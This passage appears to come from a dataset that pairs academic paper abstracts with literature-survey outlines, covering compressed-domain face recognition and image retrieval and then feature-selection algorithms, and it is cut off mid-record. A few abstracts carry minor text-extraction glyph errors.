recognition problem. --- paper_title: Exploiting Image Indexing Techniques in DCT domain paper_content: This paper is concerned with the indexing and retrieval of images based on features extracted directly from the JPEG discrete cosine transform (DCT) domain. We examine possible ways of manipulating DCT coe$cients by standard image analysis approaches to describe image shape, texture, and color. Through the Mandala transformation, our approach groups a subset of DCT coe$cients to form ten blocks. Each block represents a particular frequency content of the original image. Two blocks are used to model rough object shape; nine blocks to describe subband properties; and one block to compute color distribution. As a result, the amount of data used for processing and analysis is signi"cantly reduced. This can lead to simple yet e$cient ways of indexing and retrieval in a large-scale image database. Experimental results show that our proposed approach o!ers superior indexing speed without signi"cantly sacri"cing the retrieval accuracy. 2001 Pattern Recognition Society. Published by Elsevier Science Ltd. All rights reserved. --- paper_title: Image retrieval based on energy histograms of the low frequency DCT coefficients paper_content: With the increasing popularity of the use of compressed images, an intuitive approach for lowering computational complexity towards a practically efficient image retrieval system is to propose a scheme that is able to perform retrieval computation directly in the compressed domain. In this paper, we investigate the use of energy histograms of the low frequency DCT coefficients as features for the retrieval of DCT compressed images. We propose a feature set that is able to identify similarities on changes of image-representation due to several lossless DCT transformations. We then use the features to construct an image retrieval system based on the real-time image retrieval model. We observe that the proposed features are sufficient for performing high level retrieval on medium size image databases. And by introducing transpositional symmetry, the features can be brought to accommodate several lossless DCT transformations such as horizontal and vertical mirroring, rotating, transposing, and transversing. --- paper_title: Encoding and recognition of faces based on the human visual model and DCT paper_content: For encoding and recognizing human faces in monochrome images, we propose a new method based on a combination of the discrete cosine transform (DCT), principal component analysis (PCA), and the characteristics of the Human Visual System. The novel aspect of the proposed non-Bayesian, approach is that, in the course of the recognition of face images, we also achieve image compression (in the form of encoding). With the help of examples, we demonstrate the superiority and advantages of the new method in comparison with the results found in the literature. --- paper_title: Pattern retrieval using optimized compression transform paper_content: Images and video are currently predominantly handled in compressed form. Block-based compression standards are by far the most widespread. It is thus important to devise information processing methods operating directly in compressed domain. In this paper we investigate this possibility on the example of simple face information processing method based on the H.264 AC Transformed blocks. We use patterns of quantized 4x4 transformed blocks for representing local picture information. These patterns at different quantization levels provide very flexible representation of picture information. By combining both the AC and DC information, we represent global information in pictures by histograms of quantized block pattern distributions. The approach is tested on FERET database of face images and it is shown that despite its simplicity provides good results in the face recognition problem. --- paper_title: Exploiting the JPEG compression scheme for image retrieval paper_content: We address the problem of retrieving images from a large database using an image as a query. The method is specifically aimed at databases that store images in JPEG format, and works in the compressed domain to create index keys. A key is generated for each image in the database and is matched with the key generated for the query image. The keys are independent of the size of the image. Images that have similar keys are assumed to be similar, but there is no semantic meaning to the similarity. --- paper_title: Direct content access and extraction from JPEG compressed images paper_content: Abstract In this paper, we propose a novel design of content access and extraction algorithm for compressed image browsing and indexing, which is critical for all visual information systems. By analyzing the relationship between DCT coefficients of one block of 8×8 pixels and its four sub-blocks of 4×4 pixels, the proposed algorithm extract an approximated image with smaller size for indexing and content browsing without incurring full decompression. While the computing cost is significantly lower than full decompression, the approximated image also reserves the content features, which are sufficient for indexing and browsing as evidenced by our extensive experiments. --- paper_title: Face Recognition Using the Discrete Cosine Transform paper_content: An accurate and robust face recognition system was developed and tested. This system exploits the feature extraction capabilities of the discrete cosine transform (DCT) and invokes certain normalization techniques that increase its robustness to variations in facial geometry and illumination. The method was tested on a variety of available face databases, including one collected at McGill University. The system was shown to perform very well when compared to other approaches. --- paper_title: Object Recognition in Compressed Imagery paper_content: Image-based applications can save time and space by operating on compressed data. The problem is that most mid- and high-level image operations, such as object recognition, are formulated as sequences of operations in the image domain. Such methods need direct access to pixel information as a starting point, but the pixel information in a compressed image stream is not immediately accessible. In this paper we show how to perform object recognition directly on compressed images (JPEG) and index frames from video streams (MPEG I-frames) without recovering explicit pixel information. The approach uses eigenvectors constructed from compressed image data. Our performance results show that a five-fold speedup can be gained by using compressed data. --- paper_title: When eigenfaces are combined with wavelets paper_content: This paper presents a novel and interesting combination of wavelet techniques and eigenfaces to extract features for face recognition. Eigenfaces reduce the dimensions of face vectors while wavelets reveal information that is unavailable in the original image. Extensive experiments have been conducted to test the new approach on the ORL face database, using a radial basis function neural network classifier. The results of the experiments are encouraging and the new approach is a step forward in face recognition. --- paper_title: Recognition in the wavelet domain: a survey paper_content: The use of wavelets has grown enormously since their original inception in the mid-1980s. Since the wavelet data repre- sentation combines spatial, frequency, and scale information in a sparse data representation, they are very useful in a number of image processing applications. This paper discusses current work in applying wavelets to object and pattern recognition. Feature extrac- tion methods and search algorithms for matching images are dis- cussed. Some important issues are the search for invariant repre- sentations, similarities between existing applications and the human visual system, and the derivation of wavelets that match specific targets. Results from several existing systems and areas for future research are presented. © 2001 SPIE and IS&T. --- paper_title: Face recognition by applying wavelet subband representation and kernel associative memory paper_content: In this paper, we propose an efficient face recognition scheme which has two features: 1) representation of face images by two-dimensional (2D) wavelet subband coefficients and 2) recognition by a modular, personalised classification method based on kernel associative memory models. Compared to PCA projections and low resolution "thumb-nail" image representations, wavelet subband coefficients can efficiently capture substantial facial features while keeping computational complexity low. As there are usually very limited samples, we constructed an associative memory (AM) model for each person and proposed to improve the performance of AM models by kernel methods. Specifically, we first applied kernel transforms to each possible training pair of faces sample and then mapped the high-dimensional feature space back to input space. Our scheme using modular autoassociative memory for face recognition is inspired by the same motivation as using autoencoders for optical character recognition (OCR), for which the advantages has been proven. By associative memory, all the prototypical faces of one particular person are used to reconstruct themselves and the reconstruction error for a probe face image is used to decide if the probe face is from the corresponding person. We carried out extensive experiments on three standard face recognition datasets, the FERET data, the XM2VTS data, and the ORL data. Detailed comparisons with earlier published results are provided and our proposed scheme offers better recognition accuracy on all of the face datasets. --- paper_title: Wavelet packet analysis for face recognition paper_content: Abstract A novel method for recognition of frontal views of human faces under roughly constant illumination is presented. The proposed scheme is based on the analysis of a wavelet packet decomposition of the face images. Each face image is first located and then, described by a subset of band filtered images containing wavelet coefficients. From these wavelet coefficients, which characterize the face texture, we build compact and meaningful feature vectors, using simple statistical measures. Then, we show how an efficient and reliable probabilistic metric derived from the Bhattacharrya distance can be used in order to classify the face feature vectors into person classes. Experimental results are presented using images from the FERET and the FACES databases. The efficiency of the proposed approach is analyzed according to the FERET evaluation procedure and by comparing our results with those obtained using the well-known Eigenfaces method. --- paper_title: Wavelet-based texture features can be extracted efficiently from compressed-domain for JPEG2000 coded images paper_content: The contribution of this paper is the development of a fast, subband-based JPEG2000 image indexing system in the compressed domain which achieves high memory efficiency. This is the extended work on a previously block-based indexing system. The feature extracted is the variance of each wavelet subband in the compressed domain with the emphasis that subbands are not buffered to maintain memory efficiency. Retrieval performance on VisTex image database indexing has shown the effectiveness and speed up of execution of the proposed features. --- paper_title: Discriminant waveletfaces and nearest feature classifiers for face recognition paper_content: Feature extraction, discriminant analysis, and classification rules are three crucial issues for face recognition. We present hybrid approaches to handle three issues together. For feature extraction, we apply the multiresolution wavelet transform to extract the waveletface. We also perform the linear discriminant analysis on waveletfaces to reinforce discriminant power. During classification, the nearest feature plane (NFP) and nearest feature space (NFS) classifiers are explored for robust decisions in presence of wide facial variations. Their relationships to conventional nearest neighbor and nearest feature line classifiers are demonstrated. In the experiments, the discriminant waveletface incorporated with the NFS classifier achieves the best face recognition performance. ---
Title: Image Compression in Face Recognition-a Literature Survey Section 1: Introduction Description 1: Introduce the topic of image compression in face recognition, discuss its relevance, and outline the structure of the survey. Section 2: Spatial (pixel) domain Description 2: Overview of research on the impact of degraded image quality due to compression on face recognition accuracy in the spatial (pixel) domain, focusing on JPEG and JPEG2000. Section 3: JPEG2000 Description 3: Discussion of research on face recognition using images compressed with the JPEG2000 standard, including specific studies and their findings. Section 4: Analysis Description 4: Analysis of the reviewed studies, drawing conclusions about the impact of image compression on face recognition and identifying common experimental setups and their implications. Section 5: Transform (compressed) domain Description 5: Exploration of research on face recognition performed directly in the compressed (transform) domain using DCT and DWT coefficients. Section 6: JPEG (DCT coefficients) Description 6: Review of studies that utilize JPEG DCT coefficients for face recognition, detailing methodologies and findings. Section 7: JPEG2000 (DWT coefficients) Description 7: Review of research on using JPEG2000 DWT coefficients in face recognition, including an examination of wavelet-based recognition systems. Section 8: Conclusions Description 8: Summarize the key findings from the literature survey, discuss the implications of compression on face recognition accuracy, and suggest areas for future research.
Feature Selection: A literature Review
13
--- paper_title: Feature selection algorithms: a survey and experimental evaluation paper_content: In view of the substantial number of existing feature selection algorithms, the need arises to count on criteria that enables to adequately decide which algorithm to use in certain situations. This work assesses the performance of several fundamental algorithms found in the literature in a controlled scenario. A scoring measure ranks the algorithms by taking into account the amount of relevance, irrelevance and redundance on sample data sets. This measure computes the degree of matching between the output given by the algorithm and the known optimal solution. Sample size effects are also studied. --- paper_title: Stability of feature selection algorithms: a study on high-dimensional spaces paper_content: With the proliferation of extremely high-dimensional data, feature selection algorithms have become indispensable components of the learning process. Strangely, despite extensive work on the stability of learning algorithms, the stability of feature selection algorithms has been relatively neglected. This study is an attempt to fill that gap by quantifying the sensitivity of feature selection algorithms to variations in the training set. We assess the stability of feature selection algorithms based on the stability of the feature preferences that they express in the form of weights-scores, ranks, or a selected feature subset. We examine a number of measures to quantify the stability of feature preferences and propose an empirical way to estimate them. We perform a series of experiments with several feature selection algorithms on a set of proteomics datasets. The experiments allow us to explore the merits of each stability measure and create stability profiles of the feature selection algorithms. Finally, we show how stability profiles can support the choice of a feature selection algorithm. --- paper_title: Poem Classification Using Machine Learning Approach paper_content: The collection of poems is ever increasing on the Internet. Therefore, classification of poems is an important task along with their labels. The work in this paper is aimed to find the best classification algorithms among the K-nearest neighbor (KNN), Naive Bayesian (NB) and Support Vector Machine (SVM) with reduced features. Information Gain Ratio is used for feature selection. The results show that SVM has maximum accuracy (93.25 %) using 20 % top ranked features. --- paper_title: Concept-Based Feature Generation and Selection for Information Retrieval paper_content: Traditional information retrieval systems use query words to identify relevant documents. In difficult retrieval tasks, however, one needs access to a wealth of background knowledge. We present a method that uses Wikipedia-based feature generation to improve retrieval performance. Intuitively, we expect that using extensive world knowledge is likely to improve recall but may adversely affect precision. High quality feature selection is necessary to maintain high precision, but here we do not have the labeled training data for evaluating features, that we have in supervised learning. We present a new feature selection method that is inspired by pseudorelevance feedback. We use the top-ranked and bottom-ranked documents retrieved by the bag-of-words method as representative sets of relevant and non-relevant documents. The generated features are then evaluated and filtered on the basis of these sets. Experiments on TREC data confirm the superior performance of our method compared to the previous state of the art. --- paper_title: Robust Feature Selection Using Ensemble Feature Selection Techniques paper_content: Robustness or stability of feature selection techniques is a topic of recent interest, and is an important issue when selected feature subsets are subsequently analysed by domain experts to gain more insight into the problem modelled. In this work, we investigate the use of ensemble feature selection techniques, where multiple feature selection methods are combined to yield more robust results. We show that these techniques show great promise for high-dimensional domains with small sample sizes, and provide more robust feature subsets than a single feature selection technique. In addition, we also investigate the effect of ensemble feature selection techniques on classification performance, giving rise to a new model selection strategy. --- paper_title: Generalizability and Simplicity as Criteria in Feature Selection: Application to Mood Classification in Music paper_content: Classification of musical audio signals according to expressed mood or emotion has evident applications to content-based music retrieval in large databases. Wrapper selection is a dimension reduction method that has been proposed for improving classification performance. However, the technique is prone to lead to overfitting of the training data, which decreases the generalizability of the obtained results. We claim that previous attempts to apply wrapper selection in the field of music information retrieval (MIR) have led to disputable conclusions about the used methods due to inadequate analysis frameworks, indicative of overfitting, and biased results. This paper presents a framework based on cross-indexing for obtaining realistic performance estimate of wrapper selection by taking into account the simplicity and generalizability of the classification models. The framework is applied on sets of film soundtrack excerpts that are consensually associated with particular basic emotions, comparing Naive Bayes, k-NN, and SVM classifiers using both forward selection (FS) and backward elimination (BE). K-NN with BE yields the most promising results - 56.5% accuracy with only four features. The most useful feature subset for k-NN contains mode majorness and key clarity, combined with dynamical, rhythmical, and structural features. --- paper_title: A feature selection algorithm capable of handling extremely large data dimensionality paper_content: With the advent of high throughput technologies, feature selection has become increasingly important in a wide range of scientific disciplines. We propose a new feature selection algorithm that performs extremely well in the presence of a huge number of irrelevant features. The key idea is to decompose an arbitrarily complex nonlinear models into a set of locally linear ones through local learning, and then estimate feature relevance globally within a large margin framework. The algorithm is capable of processing many thousands of features within a few minutes on a personal computer, yet maintains a close-to-optimum accuracy that is nearly insensitive to a growing number of irrelevant features. Experiments on eight synthetic and real-world datasets are presented that demonstrate the effectiveness of the algorithm. --- paper_title: An extensive empirical study of feature selection metrics for text classification paper_content: Machine learning for text classification is the cornerstone of document categorization, news filtering, document routing, and personalization. In text domains, effective feature selection is essential to make the learning task efficient and more accurate. This paper presents an empirical comparison of twelve feature selection methods (e.g. Information Gain) evaluated on a benchmark of 229 text classification problem instances that were gathered from Reuters, TREC, OHSUMED, etc. The results are analyzed from multiple goal perspectives-accuracy, F-measure, precision, and recall-since each is appropriate in different situations. The results reveal that a new feature selection metric we call 'Bi-Normal Separation' (BNS), outperformed the others by a substantial margin in most situations. This margin widened in tasks with high class skew, which is rampant in text classification problems and is particularly challenging for induction algorithms. A new evaluation methodology is offered that focuses on the needs of the data mining practitioner faced with a single dataset who seeks to choose one (or a pair of) metrics that are most likely to yield the best performance. From this perspective, BNS was the top single choice for all goals except precision, for which Information Gain yielded the best result most often. This analysis also revealed, for example, that Information Gain and Chi-Squared have correlated failures, and so they work poorly together. When choosing optimal pairs of metrics for each of the four performance goals, BNS is consistently a member of the pair---e.g., for greatest recall, the pair BNS + F1-measure yielded the best performance on the greatest number of tasks by a considerable margin. --- paper_title: An ensemble of filters and classifiers for microarray data classification paper_content: In this paper a new framework for feature selection consisting of an ensemble of filters and classifiers is described. Five filters, based on different metrics, were employed. Each filter selects a different subset of features which is used to train and to test a specific classifier. The outputs of these five classifiers are combined by simple voting. In this study three well-known classifiers were employed for the classification task: C4.5, naive-Bayes and IB1. The rationale of the ensemble is to reduce the variability of the features selected by filters in different classification domains. Its adequacy was demonstrated by employing 10 microarray data sets. --- paper_title: Unsupervised Feature Selection Applied to Content-Based Retrieval of Lung Images paper_content: This paper describes a new hierarchical approach to content-based image retrieval called the "customized-queries" approach (CQA). Contrary to the single feature vector approach which tries to classify the query and retrieve similar images in one step, CQA uses multiple feature sets and a two-step approach to retrieval. The first step classifies the query according to the class labels of the images using the features that best discriminate the classes. The second step then retrieves the most similar images within the predicted class using the features customized to distinguish "subclasses" within that class. Needing to find the customized feature subset for each class led us to investigate feature selection for unsupervised learning. As a result, we developed a new algorithm called FSSEM (feature subset selection using expectation-maximization clustering). We applied our approach to a database of high resolution computed tomography lung images and show that CQA radically improves the retrieval precision over the single feature vector approach. To determine whether our CBIR system is helpful to physicians, we conducted an evaluation trial with eight radiologists. The results show that our system using CQA retrieval doubled the doctors' diagnostic accuracy. --- paper_title: Feature selection with ensembles, artificial variables, and redundancy elimination paper_content: Predictive models benefit from a compact, non-redundant subset of features that improves interpretability and generalization. Modern data sets are wide, dirty, mixed with both numerical and categorical predictors, and may contain interactive effects that require complex models. This is a challenge for filters, wrappers, and embedded feature selection methods. We describe details of an algorithm using tree-based ensembles to generate a compact subset of non-redundant features. Parallel and serial ensembles of trees are combined into a mixed method that can uncover masking and detect features of secondary effect. Simulated and actual examples illustrate the effectiveness of the approach. --- paper_title: Adaptive Intrusion Detection: A Data Mining Approach paper_content: In this paper we describe a data mining framework for constructingintrusion detection models. The first key idea is to mine system auditdata for consistent and useful patterns of program and user behavior.The other is to use the set of relevant system features presented inthe patterns to compute inductively learned classifiers that canrecognize anomalies and known intrusions. In order for the classifiersto be effective intrusion detection models, we need to have sufficientaudit data for training and also select a set of predictive systemfeatures. We propose to use the association rules and frequentepisodes computed from audit data as the basis for guiding the auditdata gathering and feature selection processes. We modify these twobasic algorithms to use axis attribute(s) and referenceattribute(s) as forms of item constraints to compute only therelevant patterns. In addition, we use an iterative level-wiseapproximate mining procedure to uncover the low frequency butimportant patterns. We use meta-learning as a mechanism to makeintrusion detection models more effective and adaptive. We report ourextensive experiments in using our framework on real-world audit data. --- paper_title: Causal filter selection in microarray data paper_content: The importance of bringing causality into play when designing feature selection methods is more and more acknowledged in the machine learning community. This paper proposes a filter approach based on information theory which aims to prioritise direct causal relationships in feature selection problems where the ratio between the number of features and the number of samples is high. This approach is based on the notion of interaction which is shown to be informative about the relevance of an input subset as well as its causal relationship with the target. The resulting filter, called mIMR (min-Interaction Max-Relevance), is compared with state-of-the-art approaches. Classification results on 25 real microarray datasets show that the incorporation of causal aspects in the feature assessment is beneficial both for the resulting accuracy and stability. A toy example of causal discovery shows the effectiveness of the filter for identifying direct causal relationships. --- paper_title: Gene selection algorithm by combining reliefF and mRMR paper_content: BackgroundGene expression data usually contains a large number of genes, but a small number of samples. Feature selection for gene expression data aims at finding a set of genes that best discriminate biological samples of different types. In this paper, we present a two-stage selection algorithm by combining ReliefF and mRMR: In the first stage, ReliefF is applied to find a candidate gene set; In the second stage, mRMR method is applied to directly and explicitly reduce redundancy for selecting a compact yet effective gene subset from the candidate set.ResultsWe perform comprehensive experiments to compare the mRMR-ReliefF selection algorithm with ReliefF, mRMR and other feature selection methods using two classifiers as SVM and Naive Bayes, on seven different datasets. And we also provide all source codes and datasets for sharing with others.ConclusionThe experimental results show that the mRMR-ReliefF gene selection algorithm is very effective. --- paper_title: Highly discriminative statistical features for email classification paper_content: This paper reports on email classification and filtering, more specifically on spam versus ham and phishing versus spam classification, based on content features. We test the validity of several novel statistical feature extraction methods. The methods rely on dimensionality reduction in order to retain the most informative and discriminative features. We successfully test our methods under two schemas. The first one is a classic classification scenario using a 10-fold cross-validation technique for several corpora, including four ground truth standard corpora: Ling-Spam, SpamAssassin, PU1, and a subset of the TREC 2007 spam corpus, and one proprietary corpus. In the second schema, we test the anticipatory properties of our extracted features and classification models with two proprietary datasets, formed by phishing and spam emails sorted by date, and with the public TREC 2007 spam corpus. The contributions of our work are an exhaustive comparison of several feature selection and extraction methods in the frame of email classification on different benchmarking corpora, and the evidence that especially the technique of biased discriminant analysis offers better discriminative features for the classification, gives stable classification results notwithstanding the amount of features chosen, and robustly retains their discriminative value over time and data setups. These findings are especially useful in a commercial setting, where short profile rules are built based on a limited number of features for filtering emails. --- paper_title: Feature Selection Using Mutual Information: An Experimental Study paper_content: In real-world application, data is often represented by hundreds or thousands of features. Most of them, however, are redundant or irrelevant, and their existence may straightly lead to poor performance of learning algorithms. Hence, it is a compelling requisition for their practical applications to choose most salient features. Currently, a large number of feature selection methods using various strategies have been proposed. Among these methods, the mutual information ones have recently gained much more popularity. In this paper, a general criterion function for feature selector using mutual information is firstly introduced. This function can bring up-to-date selectors based on mutual information together under an unifying scheme. Then an experimental comparative study of eight typical filter mutual information based feature selection algorithms on thirty-three datasets is presented. We evaluate them from four essential aspects, and the experimental results show that none of these methods outperforms others significantly. Even so, the conditional mutual information feature selection algorithm dominates other methods on the whole, if training time is not a matter. --- paper_title: Correlation-based Feature Selection for Machine Learning paper_content: A central problem in machine learning is identifying a representative set of features from which to construct a classification model for a particular task. This thesis addresses the problem of feature selection for machine learning through a correlation based approach. The central hypothesis is that good feature sets contain features that are highly correlated with the class, yet uncorrelated with each other. A feature evaluation formula, based on ideas from test theory, provides an operational definition of this hypothesis. CFS (Correlation based Feature Selection) is an algorithm that couples this evaluation formula with an appropriate correlation measure and a heuristic search strategy. CFS was evaluated by experiments on artificial and natural datasets. Three machine learning algorithms were used: C4.5 (a decision tree learner), IB1 (an instance based learner), and naive Bayes. Experiments on artificial datasets showed that CFS quickly identifies and screens irrelevant, redundant, and noisy features, and identifies relevant features as long as their relevance does not strongly depend on other features. On natural domains, CFS typically eliminated well over half the features. In most cases, classification accuracy using the reduced feature set equaled or bettered accuracy using the complete feature set. Feature selection degraded machine learning performance in cases where some features were eliminated which were highly predictive of very small areas of the instance space. Further experiments compared CFS with a wrapper—a well known approach to feature selection that employs the target learning algorithm to evaluate feature sets. In many cases CFS gave comparable results to the wrapper, and in general, outperformed the wrapper on small datasets. CFS executes many times faster than the wrapper, which allows it to scale to larger datasets. Two methods of extending CFS to handle feature interaction are presented and experimentally evaluated. The first considers pairs of features and the second incorporates iii feature weights calculated by the RELIEF algorithm. Experiments on artificial domains showed that both methods were able to identify interacting features. On natural domains, the pairwise method gave more reliable results than using weights provided by RELIEF. --- paper_title: Feature selection algorithms: a survey and experimental evaluation paper_content: In view of the substantial number of existing feature selection algorithms, the need arises to count on criteria that enables to adequately decide which algorithm to use in certain situations. This work assesses the performance of several fundamental algorithms found in the literature in a controlled scenario. A scoring measure ranks the algorithms by taking into account the amount of relevance, irrelevance and redundance on sample data sets. This measure computes the degree of matching between the output given by the algorithm and the known optimal solution. Sample size effects are also studied. --- paper_title: Customer Retention via Data Mining paper_content: ``Customer Retention'' is an increasingly pressing issue in today's ever-competitive commercial arena. This is especially relevant and important for sales and services related industries. Motivated by a real-world problem faced by a large company, we proposed a solution that integrates various techniques of data mining, such as feature selection via induction, deviation analysis, and mining multiple concept-level association rules to form an intuitive and novel approach to gauging customer loyalty and predicting their likelihood of defection. Immediate action triggered by these ``early-warnings'' resulting from data mining is often the key to eventual customer retention. --- paper_title: Implementing ReliefF filters to extract meaningful features from genetic lifetime datasets paper_content: BackgroundThe analysis of survival data allows to evaluate whether in a population the genetic exposure is related to the time until an event occurs. Owing to the complexity of common human diseases, there is the incipient need to develop bioinformatics tools to properly model non-linear high-order interactions in lifetime datasets. These tools, such as the survival dimensionality reduction algorithm, may suffer from extreme computational costs in large-scale datasets. Herein, we address the problem of estimating the quality of attributes, so as to extract relevant features from lifetime datasets and to scale down their size. MethodsThe ReliefF algorithm was modified and adjusted to compensate for the loss of information due to censoring, introducing reclassification and weighting schemes. Synthetic lifetime two-locus epistatic datasets of 500 attributes, 400-800 individuals and different degrees of cumulative heritability and censorship were generated. The capability of the survival ReliefF algorithm (sReliefF) and of a tuned sReliefF approach to properly select the causative pair of attributes was evaluated and compared to univariate selection based on Cox scores. Results/conclusionssReliefF methods efficiently scaled down the simulated datasets, whilst univariate selection performed no better than random choice. These approaches may help to reduce the computational cost and to improve the classification task of algorithms that model high-order interactions in presence of right-censored data. Availability: http://sourceforge.net/projects/sdrproject/files/sReliefF/. --- paper_title: Greedy Attribute Selection paper_content: Abstract Many real-world domains bless us with a wealth of attributes to use for learning. This blessing is often a curse: most inductive methods generalize worse given too many attributes than if given a good subset of those attributes. We examine this problem for two learning tasks taken from a calendar scheduling domain. We show that ID3/C4.5 generalizes poorly on these tasks if allowed to use all available attributes. We examine five greedy hillclimbing procedures that search for attribute sets that generalize well with ID3/C4.5. Experiments suggest hillclimbing in attribute space can yield substantial improvements in generalization performance. We present a caching scheme that makes attribute hillclimbing more practical computationally. We also compare the results of hillclimbing in attribute space with FOCUS and RELIEF on the two tasks. --- paper_title: Iterative RELIEF for feature weighting paper_content: We propose a series of new feature weighting algorithms, all stemming from a new interpretation of RELIEF as an online algorithm that solves a convex optimization problem with a margin-based objective function. The new interpretation explains the simplicity and effectiveness of RELIEF, and enables us to identify some of its weaknesses. We offer an analytic solution to mitigate these problems. We extend the newly proposed algorithm to handle multiclass problems by using a new multiclass margin definition. To reduce computational costs, an online learning algorithm is also developed. Convergence theorems of the proposed algorithms are presented. Some experiments based on the UCI and microarray datasets are performed to demonstrate the effectiveness of the proposed algorithms. --- paper_title: Performance of feature-selection methods in the classification of high-dimension data paper_content: Contemporary biological technologies produce extremely high-dimensional data sets from which to design classifiers, with 20,000 or more potential features being common place. In addition, sample sizes tend to be small. In such settings, feature selection is an inevitable part of classifier design. Heretofore, there have been a number of comparative studies for feature selection, but they have either considered settings with much smaller dimensionality than those occurring in current bioinformatics applications or constrained their study to a few real data sets. This study compares some basic feature-selection methods in settings involving thousands of features, using both model-based synthetic data and real data. It defines distribution models involving different numbers of markers (useful features) versus non-markers (useless features) and different kinds of relations among the features. Under this framework, it evaluates the performances of feature-selection algorithms for different distribution models and classifiers. Both classification error and the number of discovered markers are computed. Although the results clearly show that none of the considered feature-selection methods performs best across all scenarios, there are some general trends relative to sample size and relations among the features. For instance, the classifier-independent univariate filter methods have similar trends. Filter methods such as the t-test have better or similar performance with wrapper methods for harder problems. This improved performance is usually accompanied with significant peaking. Wrapper methods have better performance when the sample size is sufficiently large. ReliefF, the classifier-independent multivariate filter method, has worse performance than univariate filter methods in most cases; however, ReliefF-based wrapper methods show performance similar to their t-test-based counterparts. --- paper_title: Feature selection for high-dimensional genomic microarray data paper_content: We report on the successful application of feature selection methods to a classification problem in molecular biology involving only 72 data points in a 7130 dimensional space. Our approach is a hybrid of filter and wrapper approaches to feature selection. We make use of a sequence of simple filters, culminating in Koller and Sahami’s (1996) Markov Blanket filter, to decide on particular feature subsets for each subset cardinality. We compare between the resulting subset cardinalities using cross validation. The paper also investigates regularization methods as an alternative to feature selection, showing that feature selection methods are preferable in this problem. --- paper_title: Feature selection and classification in multiple class datasets: An application to KDD Cup 99 dataset paper_content: Research highlights? A combination of discretizers, filters and classifiers is presented. ? This combination is applied to binary and multiple class classification problems. ? Its performance is compared to KDD Cup winner and other methods results. ? It achieves better performance while significantly reduces the number of features. In this work, a new method consisting of a combination of discretizers, filters and classifiers is presented. Its aim is to improve the performance results of classifiers but using a significantly reduced set of features. The method has been applied to a binary and to a multiple class classification problem. Specifically, the KDD Cup 99 benchmark was used for testing its effectiveness. A comparative study with other methods and the KDD winner was accomplished. The results obtained showed the adequacy of the proposed method, achieving better performance in most cases while reducing the number of features in more than 80%. --- paper_title: A GA-based Feature Selection Algorithm for Remote Sensing Images paper_content: We present a GA-based feature selection algorithm in which feature subsets are evaluated by means of a separability index. This index is based on a filter method, which allows to estimate statistical properties of the data, independently of the classifier used. More specifically, the defined index uses covariance matrices for evaluating how spread out the probability distributions of data are in a given n-dimensional space. The effectiveness of the approach has been tested on two satellite images and the results have been compared with those obtained without feature selection and with those obtained by using a previously developed GA-based feature selection algorithm. --- paper_title: Obtaining scalable and accurate classification in large-scale spatio-temporal domains paper_content: We present an approach for learning models that obtain accurate classification of data objects, collected in large-scale spatio-temporal domains. The model generation is structured in three phases: spatial dimension reduction, spatio-temporal features extraction, and feature selection. Novel techniques for the first two phases are presented, with two alternatives for the middle phase. We explore model generation based on the combinations of techniques from each phase. We apply the introduced methodology to data-sets from the Voltage-Sensitive Dye Imaging (VSDI) domain, where the resulting classification models successfully decode neuronal population responses in the visual cortex of behaving animals. VSDI is currently the best technique enabling simultaneous high spatial (10,000 points) and temporal (10 ms or less) resolution imaging from neuronal population in the cortex. We demonstrate that not only our approach is scalable enough to handle computationally challenging data, but it also contributes to the neuroimaging field of study with its decoding abilities. The effectiveness of our methodology is further explored on a data-set from the hurricanes domain, and a promising direction, based on the preliminary results of hurricane severity classification, is revealed. --- paper_title: Redundancy based feature selection for microarray data paper_content: In gene expression microarray data analysis, selecting a small number of discriminative genes from thousands of genes is an important problem for accurate classification of diseases or phenotypes. The problem becomes particularly challenging due to the large number of features (genes) and small sample size. Traditional gene selection methods often select the top-ranked genes according to their individual discriminative power without handling the high degree of redundancy among the genes. Latest research shows that removing redundant genes among selected ones can achieve a better representation of the characteristics of the targeted phenotypes and lead to improved classification accuracy. Hence, we study in this paper the relationship between feature relevance and redundancy and propose an efficient method that can effectively remove redundant genes. The efficiency and effectiveness of our method in comparison with representative methods has been demonstrated through an empirical study using public microarray data sets. --- paper_title: Toward integrating feature selection algorithms for classification and clustering paper_content: This paper introduces concepts and algorithms of feature selection, surveys existing feature selection algorithms for classification and clustering, groups and compares different algorithms with a categorizing framework based on search strategies, evaluation criteria, and data mining tasks, reveals unattempted combinations, and provides guidelines in selecting feature selection algorithms. With the categorizing framework, we continue our efforts toward-building an integrated system for intelligent feature selection. A unifying platform is proposed as an intermediate step. An illustrative example is presented to show how existing feature selection algorithms can be integrated into a meta algorithm that can take advantage of individual algorithms. An added advantage of doing so is to help a user employ a suitable algorithm without knowing details of each algorithm. Some real-world applications are included to demonstrate the use of feature selection in data mining. We conclude this work by identifying trends and challenges of feature selection research and development. --- paper_title: Feature Selection for Classification paper_content: Feature selection has been the focus of interest for quite some time and much work has been done. With the creation of huge databases and the consequent requirements for good machine learning techniques, new problems arise and novel approaches to feature selection are in demand. This survey is a comprehensive overview of many existing methods from the 1970's to the present. It identifies four steps of a typical feature selection method, and categorizes the different existing methods in terms of generation procedures and evaluation functions, and reveals hitherto unattempted combinations of generation procedures and evaluation functions. Representative methods are chosen from each category for detailed explanation and discussion via example. Benchmark datasets with different characteristics are used for comparative study. The strengths and weaknesses of different methods are explained. Guidelines for applying feature selection methods are given based on data types and domain characteristics. This survey identifies the future research areas in feature selection, introduces newcomers to this field, and paves the way for practitioners who search for suitable methods for solving domain-specific real-world applications. --- paper_title: A Branch and Bound Algorithm for Feature Subset Selection paper_content: A feature subset selection algorithm based on branch and bound techniques is developed to select the best subset of m features from an n-feature set. Existing procedures for feature subset selection, such as sequential selection and dynamic programming, do not guarantee optimality of the selected feature subset. Exhaustive search, on the other hand, is generally computationally unfeasible. The present algorithm is very efficient and it selects the best subset without exhaustive search. Computational aspects of the algorithm are discussed. Results of several experiments demonstrate the very substantial computational savings realized. For example, the best 12-feature set from a 24-feature set was selected with the computational effort of evaluating only 6000 subsets. Exhaustive search would require the evaluation of 2 704 156 subsets. --- paper_title: Feature Selection for Knowledge Discovery and Data Mining paper_content: From the Publisher: ::: With advanced computer technologies and their omnipresent usage, data accumulates in a speed unmatchable by the human's capacity to process data. To meet this growing challenge, the research community of knowledge discovery from databases emerged. The key issue studied by this community is, in layman's terms, to make advantageous use of large stores of data. In order to make raw data useful, it is necessary to represent, process, and extract knowledge for various applications. Feature Selection for Knowledge Discovery and Data Mining offers an overview of the methods developed since the 1970's and provides a general framework in order to examine these methods and categorize them. This book employs simple examples to show the essence of representative feature selection methods and compares them using data sets with combinations of intrinsic properties according to the objective of feature selection. In addition, the book suggests guidelines for how to use different methods under various circumstances and points out new challenges in this exciting area of research. Feature Selection 